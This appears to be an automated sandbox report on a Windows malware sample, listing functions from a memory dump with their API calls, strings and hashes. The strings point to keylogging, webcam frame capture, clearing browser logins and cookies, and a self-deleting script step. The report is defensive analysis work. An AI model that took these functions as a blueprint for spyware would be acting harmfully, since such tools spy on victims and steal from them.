Instruction ID: 0e8ff1e7bf94726707b95a2ea2eb2a738027cd1da7e878330fc773e679c7ecaa
Opcode Fuzzy Hash: 4f3e5902103fbf73d685bb82c023768945668d30e32b5126960101710bc94102
Instruction Fuzzy Hash: 5171D231900216ABCF21CF59C884BBFBB75EF59324F14222BEA1167282D7789D41C7E9

Uniqueness

Uniqueness Score: -1.00%

Function 00404486, Relevance: 7.7, APIs: 1, Strings: 4, Instructions: 208sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 004028D8: std::_Xinvalid_argument.LIBCPMT ref: 004028DD

Sleep.KERNEL32(00000000,?), ref: 004045DB

Part of subcall function 0040471E: __EH_prolog.LIBCMT ref: 00404723

Strings

FreeFrame, xrefs: 004046C7
OpenCamera, xrefs: 00404699
CloseCamera, xrefs: 004046A5
GetFrame, xrefs: 004046B6

Memory Dump Source

Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: H_prologSleepXinvalid_argumentstd::_
String ID: CloseCamera$FreeFrame$GetFrame$OpenCamera
API String ID: 834325642-3547787478
Opcode ID: 7417a0c5ab63d1e5e224628f01b3af9e13e40c54480966dc25f5329f4d926a97
Instruction ID: 36a5e228549547fe3264f4e150403a2e0a3e3e2746ad4685d8a770f54e79c9b4
Opcode Fuzzy Hash: 7417a0c5ab63d1e5e224628f01b3af9e13e40c54480966dc25f5329f4d926a97
Instruction Fuzzy Hash: 6651E4B1604200ABCA05BB769D0A66E3B559BC5308F00443FF905BB7E2EF7D8945879E

Uniqueness

Uniqueness Score: -1.00%

Function 0040F6A7, Relevance: 7.7, APIs: 5, Instructions: 206memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 0040F14A: SetLastError.KERNEL32(0000000D,0040F6C6,00000000,00000000,0040AF7B), ref: 0040F150

SetLastError.KERNEL32(000000C1,00000000,00000000,0040AF7B), ref: 0040F6DD
GetNativeSystemInfo.KERNEL32(?,00000000,00000000,0040AF7B), ref: 0040F750
GetProcessHeap.KERNEL32(00000008,00000040), ref: 0040F7BC
HeapAlloc.KERNEL32(00000000), ref: 0040F7C3
SetLastError.KERNEL32(0000045A), ref: 0040F8D5

Part of subcall function 0040F65A: VirtualFree.KERNEL32(00008000,00000000,00000000,?,0040F7DC,00000000,00000000,00008000,00000000), ref: 0040F666

Memory Dump Source

Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: ErrorLast$Heap$AllocFreeInfoNativeProcessSystemVirtual
String ID:
API String ID: 486403682-0
Opcode ID: eb120fceeea753676480937062db3c536b07788e457956489b4c9a7f2f50d659
Instruction ID: 31fca79699fb41a21c899f6cb63a77230b732fc93c9d9a7c568002a0e8237c26
Opcode Fuzzy Hash: eb120fceeea753676480937062db3c536b07788e457956489b4c9a7f2f50d659
Instruction Fuzzy Hash: 66610771A00201ABCB30AF65CC81B6A77A5BF44744F14403AE804BBBC1D77CED4ADB99

Uniqueness

Uniqueness Score: -1.00%

Function 0043E550, Relevance: 7.7, APIs: 5, Instructions: 187COMMON

Download Yara Rule

APIs

Part of subcall function 0043F98C: RtlAllocateHeap.NTDLL(00000000,0043001C,?,?,00431747,?,?,0046C500,?,?,0040B6CB,0043001C,?,?,?,?), ref: 0043F9BE

_free.LIBCMT ref: 0043E65B
_free.LIBCMT ref: 0043E672
_free.LIBCMT ref: 0043E691
_free.LIBCMT ref: 0043E6AC
_free.LIBCMT ref: 0043E6C3

Memory Dump Source

Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: _free$AllocateHeap
String ID:
API String ID: 3033488037-0
Opcode ID: 0e44e192ae9f7449bc2dcdd52dfacc8fa8f025cb327802adf5d2bcb5333049c9
Instruction ID: 9ca46151fc1eb59705b8745a81b868f81510b806d69f04cfdfe39fc5a4c1e60e
Opcode Fuzzy Hash: 0e44e192ae9f7449bc2dcdd52dfacc8fa8f025cb327802adf5d2bcb5333049c9
Instruction Fuzzy Hash: 2C51E371A02304AFDB20DF2BC842B6A77F4EF5C724F54156EE909D7290E739D9018B88

Uniqueness

Uniqueness Score: -1.00%

Function 0043D66D, Relevance: 7.6, APIs: 5, Instructions: 129COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0043D6DF
_free.LIBCMT ref: 0043D6FF

Memory Dump Source

Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 34b32c66eb4d22029e8a4803b0364031336475c6bcc7b56bc7984bb1051fc465
Instruction ID: f44f3642cdb3200b4d66470b3fc96812a0cc5a4b7e600cbe4d0621a0c6eb3eb9
Opcode Fuzzy Hash: 34b32c66eb4d22029e8a4803b0364031336475c6bcc7b56bc7984bb1051fc465
Instruction Fuzzy Hash: 9A41D136E00200DBDB20DF78D881A5EB3B5EF89714F1545AEE615EB351EB35AD01CB89

Uniqueness

Uniqueness Score: -1.00%

Function 004493AC, Relevance: 7.6, APIs: 5, Instructions: 110COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00428E1A,?,?,?,00000001,?,?,00000001,00428E1A,00428E1A), ref: 004493F9
__alloca_probe_16.LIBCMT ref: 00449431
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,00428E1A,?,?,?,00000001,?,?,00000001,00428E1A,00428E1A,?), ref: 00449482
GetStringTypeW.KERNEL32(00000001,00000000,00000000,00000001,?,?,?,00000001,?,?,00000001,00428E1A,00428E1A,?,00000002,?), ref: 00449494
__freea.LIBCMT ref: 0044949D

Part of subcall function 0043F98C: RtlAllocateHeap.NTDLL(00000000,0043001C,?,?,00431747,?,?,0046C500,?,?,0040B6CB,0043001C,?,?,?,?), ref: 0043F9BE

Memory Dump Source

Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
String ID:
API String ID: 313313983-0
Opcode ID: cce82c534eee8c0eed9136d7476892f93b41b1e858a0b671dc24d243c078f96e
Instruction ID: e49a694d908820c5dcacf8e8a5bbec85b76551c47cbf7292b4779bafd8218c50
Opcode Fuzzy Hash: cce82c534eee8c0eed9136d7476892f93b41b1e858a0b671dc24d243c078f96e
Instruction Fuzzy Hash: 1231ED72A0020AABEF249F65DC41DAF7BA5EF00714F04412AFC08D7291E739DD52DBA8

Uniqueness

Uniqueness Score: -1.00%

Function 0040A523, Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 103sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32 ref: 0040A538
Sleep.KERNEL32(00001388), ref: 0040A5C0

Strings

[Cleared browsers logins and cookies.], xrefs: 0040A5FB
Cleared browsers logins and cookies., xrefs: 0040A60C
[Info], xrefs: 0040A61B

Memory Dump Source

Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: Sleep
String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.$[Info]
API String ID: 3472027048-899236412
Opcode ID: 1ce5ddeee7aadce013dbbc5bc7a8580bd8306b6d4878d132d927843ece27aca6
Instruction ID: 6d279061f464f32cb3b26c385cb9bb5b4933cac79da48b767b21b0c9aa47c76d
Opcode Fuzzy Hash: 1ce5ddeee7aadce013dbbc5bc7a8580bd8306b6d4878d132d927843ece27aca6
Instruction Fuzzy Hash: 8B31B0002483817ECA1167B518267EB6B921E53348F09447FF8D42B3D3DABA482C93AF

Uniqueness

Uniqueness Score: -1.00%

Function 00417947, Relevance: 7.6, APIs: 5, Instructions: 69fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,0045F724,00000000,00000000,?,0040B0BC,00000000,00000000), ref: 00417986
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,0040B0BC,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName),00000000), ref: 004179A2
CloseHandle.KERNEL32(00000000,?,0040B0BC,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName),00000000), ref: 004179AE
WriteFile.KERNEL32(00000000,?,00000000,?,00000000,?,0040B0BC,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName),00000000), ref: 004179C0
CloseHandle.KERNEL32(00000000,?,0040B0BC,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName),00000000), ref: 004179CD

Memory Dump Source

Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: File$CloseHandle$CreatePointerWrite
String ID:
API String ID: 1852769593-0
Opcode ID: 383baa84939929bf75120ec4d4151508e075529889950a0f9d8542cd4da3f7c8
Instruction ID: 60abe95f3f53f8d2d0590be13cf87a5088bcec8eb26bc593558798ef6058d585
Opcode Fuzzy Hash: 383baa84939929bf75120ec4d4151508e075529889950a0f9d8542cd4da3f7c8
Instruction Fuzzy Hash: 8F11E0B1214118BFFB104F649C89EFB777CEB063B2F104266F915D6280C6749E888A68

Uniqueness

Uniqueness Score: -1.00%

Function 004475DA, Relevance: 7.6, APIs: 5, Instructions: 68COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 004475E3
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00447606

Part of subcall function 0043F98C: RtlAllocateHeap.NTDLL(00000000,0043001C,?,?,00431747,?,?,0046C500,?,?,0040B6CB,0043001C,?,?,?,?), ref: 0043F9BE

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044762C
_free.LIBCMT ref: 0044763F
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044764E

Memory Dump Source

Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
String ID:
API String ID: 336800556-0
Opcode ID: ff0ef2b5bd68759a5bb2af28ad7db221fac1a14d15d758b7e8a29f0401de12d4
Instruction ID: f196bec27739b8aa23800adfafa3dc4af21a9600f240203cb0157e91f0545353
Opcode Fuzzy Hash: ff0ef2b5bd68759a5bb2af28ad7db221fac1a14d15d758b7e8a29f0401de12d4
Instruction Fuzzy Hash: D701B1B2605B117B77211ABA5C88C7B6A6EDAC6BB6716012AB904C3241DF698D0381BC

Uniqueness

Uniqueness Score: -1.00%

Function 0043D8BC, Relevance: 7.5, APIs: 5, Instructions: 30COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0043D8DA

Part of subcall function 004401F5: RtlFreeHeap.NTDLL(00000000,00000000,?,00448EEF,00000000,00000000,00000000,00000000,?,00449193,00000000,00000007,00000000,?,004496DE,00000000), ref: 0044020B
Part of subcall function 004401F5: GetLastError.KERNEL32(00000000,?,00448EEF,00000000,00000000,00000000,00000000,?,00449193,00000000,00000007,00000000,?,004496DE,00000000,00000000), ref: 0044021D

_free.LIBCMT ref: 0043D8EC
_free.LIBCMT ref: 0043D8FF
_free.LIBCMT ref: 0043D910
_free.LIBCMT ref: 0043D921

Memory Dump Source

Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: a7a9538d0cb85230f9e5fc11bbdddd4393d5212c982b8a8952a49a39c05a4c0d
Instruction ID: 5add5f9177ea0066f46c3e8b3c16d1701801f70c1477332ad76d85b4da6d78c6
Opcode Fuzzy Hash: a7a9538d0cb85230f9e5fc11bbdddd4393d5212c982b8a8952a49a39c05a4c0d
Instruction Fuzzy Hash: 08F0FEB1842A209BD7117F95BC424053B60E704728711053BF611E6771FBBA08A1DFDF

Uniqueness

Uniqueness Score: -1.00%

Function 00446969, Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 168COMMON

Download Yara Rule

APIs

_strpbrk.LIBCMT ref: 004469B8
_free.LIBCMT ref: 00446AD5

Part of subcall function 0043698A: IsProcessorFeaturePresent.KERNEL32(00000017,0043695C,00000000,00000000,?,0046C518,0040D10E,00000000,?,?,0043697C,00000000,00000000,00000000,00000000,00000000), ref: 0043698C
Part of subcall function 0043698A: GetCurrentProcess.KERNEL32(C0000417), ref: 004369AE
Part of subcall function 0043698A: TerminateProcess.KERNEL32(00000000), ref: 004369B5

Strings

*?, xrefs: 004469AC
., xrefs: 00446C8C

Memory Dump Source

Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: Process$CurrentFeaturePresentProcessorTerminate_free_strpbrk
String ID: *?$.
API String ID: 2812119850-3972193922
Opcode ID: 137a9f4ad955f4626591eb4d424c202b9ba50c1f2292fbc06302f1bc433b3f7a
Instruction ID: 2df9b6113c9c77aaef819b405c4b5e21061328770e73cee352be1be1b5cbe390
Opcode Fuzzy Hash: 137a9f4ad955f4626591eb4d424c202b9ba50c1f2292fbc06302f1bc433b3f7a
Instruction Fuzzy Hash: 9A51C5B1E00109AFEF14CFA9C841AAEB7B5EF4A314F25816EE454F7300E6799E018B55

Uniqueness

Uniqueness Score: -1.00%

Function 0040951E, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 48COMMON

Download Yara Rule

APIs

Part of subcall function 00409634: GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 00409642
Part of subcall function 00409634: wsprintfW.USER32 ref: 004096C3
Part of subcall function 00409634: SetEvent.KERNEL32(?,00000000), ref: 004096ED

Part of subcall function 00416C80: GetLocalTime.KERNEL32(00000000), ref: 00416C9A

CloseHandle.KERNEL32(?), ref: 00409581
UnhookWindowsHookEx.USER32 ref: 00409594

Strings

Online Keylogger Stopped, xrefs: 0040952E, 00409536, 0040955D
[Info], xrefs: 00409568

Memory Dump Source

Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: LocalTime$CloseEventHandleHookUnhookWindowswsprintf
String ID: Online Keylogger Stopped$[Info]
API String ID: 3650414481-1913360614
Opcode ID: d05e29fd4c4169558168c6acdabe48bc4f406678a23b9058febf417f6e87b0e6
Instruction ID: 0bb2a425696eaad1e840e03cb6b1d67cba19ac7ec2a577a4888382e5ddaa93e6
Opcode Fuzzy Hash: d05e29fd4c4169558168c6acdabe48bc4f406678a23b9058febf417f6e87b0e6
Instruction Fuzzy Hash: 6201F5316002016BD7267B29CC0B7BE7BB58B42305F80006EE981221D3EBBD595AC7DE

Uniqueness

Uniqueness Score: -1.00%

Function 0040C0AB, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 45COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 0040C119

Strings

ios_base::failbit set, xrefs: 0040C0FB
ios_base::badbit set, xrefs: 0040C0D5
ios_base::eofbit set, xrefs: 0040C108

Memory Dump Source

Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: Exception@8Throw
String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
API String ID: 2005118841-1866435925
Opcode ID: 92f0f012ab8be239e50056247fdc818a5de3ea501611d2d121b0742182c93af8
Instruction ID: fbfdbc6450803e664eb4f4f41a0da8e4bd286e2513790d23a86e9e7a09bff230
Opcode Fuzzy Hash: 92f0f012ab8be239e50056247fdc818a5de3ea501611d2d121b0742182c93af8
Instruction Fuzzy Hash: 5C01A770644208EAD714E791CC93FBB73549B10744F60853BBE01791C3EA7C5542CA5F

Uniqueness

Uniqueness Score: -1.00%

Function 0041094E, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 40registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32(80000000,http\shell\open\command,00000000,00020019,00000000,0046C578,?), ref: 00410978
RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,00000000,?,00000400), ref: 00410993
RegCloseKey.ADVAPI32(00000000), ref: 0041099C

Strings

http\shell\open\command, xrefs: 0041096E

Memory Dump Source

Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: CloseOpenQueryValue
String ID: http\shell\open\command
API String ID: 3677997916-1487954565
Opcode ID: 6e92095d02e46624d881629d473bbed2b7895e2f1f32a5b9a2dde9abf283c6c6
Instruction ID: 1fd5564dc1120aea69868d5849519b592669f7fe773aa548349f028f89f009b1
Opcode Fuzzy Hash: 6e92095d02e46624d881629d473bbed2b7895e2f1f32a5b9a2dde9abf283c6c6
Instruction Fuzzy Hash: 79F0C871500208FBDB10DA95EC09EDFBBBCEB84B52F1040A6B944E1151DA749B85C7A9

Uniqueness

Uniqueness Score: -1.00%

Function 004013AD, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 7libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(User32.dll,GetCursorInfo), ref: 004013B7
GetProcAddress.KERNEL32(00000000), ref: 004013BE

Strings

GetCursorInfo, xrefs: 004013AD
User32.dll, xrefs: 004013B2

Memory Dump Source

Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: AddressHandleModuleProc
String ID: GetCursorInfo$User32.dll
API String ID: 1646373207-2714051624
Opcode ID: 7977a5557b776f61f264f3e489a064094cdfaca646ab3a6ed5e8a62dd2d62907
Instruction ID: 2d5915eac24d434730a095519f9524ab5112888a720461ae5624eff83defc800
Opcode Fuzzy Hash: 7977a5557b776f61f264f3e489a064094cdfaca646ab3a6ed5e8a62dd2d62907
Instruction Fuzzy Hash: AAB092B0582B10ABC6007FA0AD0D9087AB4E658B43B2000B3B102C39E5EBB881209F1F

Uniqueness

Uniqueness Score: -1.00%

Function 00401468, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 7libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(User32.dll,GetLastInputInfo), ref: 00401472
GetProcAddress.KERNEL32(00000000), ref: 00401479

Strings

GetLastInputInfo, xrefs: 00401468
User32.dll, xrefs: 0040146D

Memory Dump Source

Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: AddressLibraryLoadProc
String ID: GetLastInputInfo$User32.dll
API String ID: 2574300362-1519888992
Opcode ID: 061009d7c2b90945a6648eacf09c202092d3b15d3df962e76e333c2cd1922b96
Instruction ID: efdeec6c1e0f4d8d8c2c1c08f07324648747689b8805d4bbb4dbcfd19e195539
Opcode Fuzzy Hash: 061009d7c2b90945a6648eacf09c202092d3b15d3df962e76e333c2cd1922b96
Instruction Fuzzy Hash: F8B092B05427049BC740AFF0AC4DA087A78B644F43B1001A6F142825E9EBB88110AA2F

Uniqueness

Uniqueness Score: -1.00%

Function 00401485, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 7libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,GetConsoleWindow), ref: 0040148F
GetProcAddress.KERNEL32(00000000), ref: 00401496

Strings

GetConsoleWindow, xrefs: 00401485
kernel32.dll, xrefs: 0040148A

Memory Dump Source

Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: AddressLibraryLoadProc
String ID: GetConsoleWindow$kernel32.dll
API String ID: 2574300362-100875112
Opcode ID: 2f40303a78aba9bee768f751903e191da351897d6f773a22111597fdc6b84b83
Instruction ID: d846cdfbb623d578af620becd0756bbfaced08f68ce80228df047fade16f1a3c
Opcode Fuzzy Hash: 2f40303a78aba9bee768f751903e191da351897d6f773a22111597fdc6b84b83
Instruction Fuzzy Hash: D6B092B05433049BC7509FB0AE5DA097B79A604F87B1000A6F641821E9EEB881009A2F

Uniqueness

Uniqueness Score: -1.00%

Function 00443812, Relevance: 6.3, APIs: 4, Instructions: 305COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 0044389D
__alldvrm.LIBCMT ref: 00443A9E
__alldvrm.LIBCMT ref: 00443AC0

Memory Dump Source

Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: __alldvrm$_strrchr
String ID:
API String ID: 1036877536-0
Opcode ID: 9d124845995ada22dcd12b1ab66e5f28888bf71f56cbd97164ef69fdac796ab1
Instruction ID: 66ba9c3cc4a36ed88c16bb93380f7ac1aac5537698642897c3979fdba8336104
Opcode Fuzzy Hash: 9d124845995ada22dcd12b1ab66e5f28888bf71f56cbd97164ef69fdac796ab1
Instruction Fuzzy Hash: A0A14672A403869FFB11CE18C8817AEBBE1EF15756F18416FE485AB382C27C9E45C758

Uniqueness

Uniqueness Score: -1.00%

Function 0045029A, Relevance: 6.2, APIs: 4, Instructions: 152COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 004503C9

Memory Dump Source

Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 726ed960836f92d13732dc773a04edebdb7e58f2a196df32ea860ac61663b27c
Instruction ID: ec6e5165c6e0660f46293b9fdcc1e9d4cfa0c4fde508876c15d21b96f536f29c
Opcode Fuzzy Hash: 726ed960836f92d13732dc773a04edebdb7e58f2a196df32ea860ac61663b27c
Instruction Fuzzy Hash: A9417D35A00500ABDB206FBA8C45A6F3BA4EF45376F14065FFC18D7293D67C8815866E

Uniqueness

Uniqueness Score: -1.00%

Function 0043C481, Relevance: 6.1, APIs: 4, Instructions: 133COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0a5fab5ada6cfef24b75fb2c047679192d29c36a38110dc1207f8a641355624c
Instruction ID: 733164f05b9f7aeaec00074263a2a0c70db5c9dd2c0fe6a7367e2e5b9d18385d
Opcode Fuzzy Hash: 0a5fab5ada6cfef24b75fb2c047679192d29c36a38110dc1207f8a641355624c
Instruction Fuzzy Hash: 20412972600714BFD7249F78CC81B6ABBE8EB8C714F10952FF111EB281D779A9018B84

Uniqueness

Uniqueness Score: -1.00%

Function 00408A51, Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 82sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 00417ABF: GetForegroundWindow.USER32(75146490,?), ref: 00417ACF
Part of subcall function 00417ABF: GetWindowTextLengthW.USER32(00000000), ref: 00417AD8
Part of subcall function 00417ABF: GetWindowTextW.USER32 ref: 00417B02

Sleep.KERNEL32(000001F4), ref: 00408AAF
Sleep.KERNEL32(00000064), ref: 00408B49

Strings

[ , xrefs: 00408AC7
], xrefs: 00408AB3

Memory Dump Source

Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: Window$SleepText$ForegroundLength
String ID: [ $ ]
API String ID: 3309952895-93608704
Opcode ID: 04650875d2e3cd829fc5a5013f869fac9cf13885e325612621793baa6fadb899
Instruction ID: 8573281f0cdc3ffc3b69c5d15ae9f7dd0d08734189249b75f226d29c1755f02c
Opcode Fuzzy Hash: 04650875d2e3cd829fc5a5013f869fac9cf13885e325612621793baa6fadb899
Instruction Fuzzy Hash: EE21B0B160420067C604B676DD1396F72699F90348F40043FF982772E3EE3DAA09869F

Uniqueness

Uniqueness Score: -1.00%

Function 0043D288, Relevance: 6.1, APIs: 4, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e045b006ec71bff0d6637dc505d4d6c96b33cafbc474a75c8b12d06592a8d02f
Instruction ID: e4b0062e58d0d7237c716dd182029255e048b2798701f0240ba592bb915f7d8f
Opcode Fuzzy Hash: e045b006ec71bff0d6637dc505d4d6c96b33cafbc474a75c8b12d06592a8d02f
Instruction Fuzzy Hash: 5101F2B2A097063EF6212A783CC1F27220CDF453B8F341B6BF521622D5DE78CC014168

Uniqueness

Uniqueness Score: -1.00%

Function 0043D307, Relevance: 6.1, APIs: 4, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8d57020a1a90071e2a39cbb7037a22a5c1f2285c2425725c1ac8df3bf490dd73
Instruction ID: af3406132430cef04dbb00c021b8739ed0fb4e326e8fb5295b0caa8951ed8692
Opcode Fuzzy Hash: 8d57020a1a90071e2a39cbb7037a22a5c1f2285c2425725c1ac8df3bf490dd73
Instruction Fuzzy Hash: 6D0167B29096167AA71125797CC1D6B631CEF553B9B20132BB921512D1DA78CC114169

Uniqueness

Uniqueness Score: -1.00%

Function 00442033, Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,0046C518,00000000,00000000,?,00441FDA,0046C518,00000000,00000000,00000000,?,00442306,00000006,FlsSetValue), ref: 00442065
GetLastError.KERNEL32(?,00441FDA,0046C518,00000000,00000000,00000000,?,00442306,00000006,FlsSetValue,00459068,00459070,00000000,00000364,?,00441DB4), ref: 00442071
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00441FDA,0046C518,00000000,00000000,00000000,?,00442306,00000006,FlsSetValue,00459068,00459070,00000000), ref: 0044207F

Memory Dump Source

Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: 5876dbb1db08068e45b27a8b40375508f8d8c7a9e5a20dc41c15f5dc73dd1d81
Instruction ID: 1f93bee859a7bc905b4f209078c92e3314857c5c8a056cdaea3c14562744cb27
Opcode Fuzzy Hash: 5876dbb1db08068e45b27a8b40375508f8d8c7a9e5a20dc41c15f5dc73dd1d81
Instruction Fuzzy Hash: EC01D432601723ABD7314E789D44A6777D8AF55BA2BA00632FB06D3241DB64D801C6E9

Uniqueness

Uniqueness Score: -1.00%

Function 004179DC, Relevance: 6.1, APIs: 4, Instructions: 52fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,00000000,00000000,?,00408D8E), ref: 004179F9
GetFileSize.KERNEL32(00000000,00000000,?,?,00408D8E), ref: 00417A0D
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,?,00408D8E), ref: 00417A32
CloseHandle.KERNEL32(00000000,00408D8E), ref: 00417A40

Memory Dump Source

Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: File$CloseCreateHandleReadSize
String ID:
API String ID: 3919263394-0
Opcode ID: 42e664b68ac7724ba780c5c00098682f8beb43ab86657588be60b934e4d9d7db
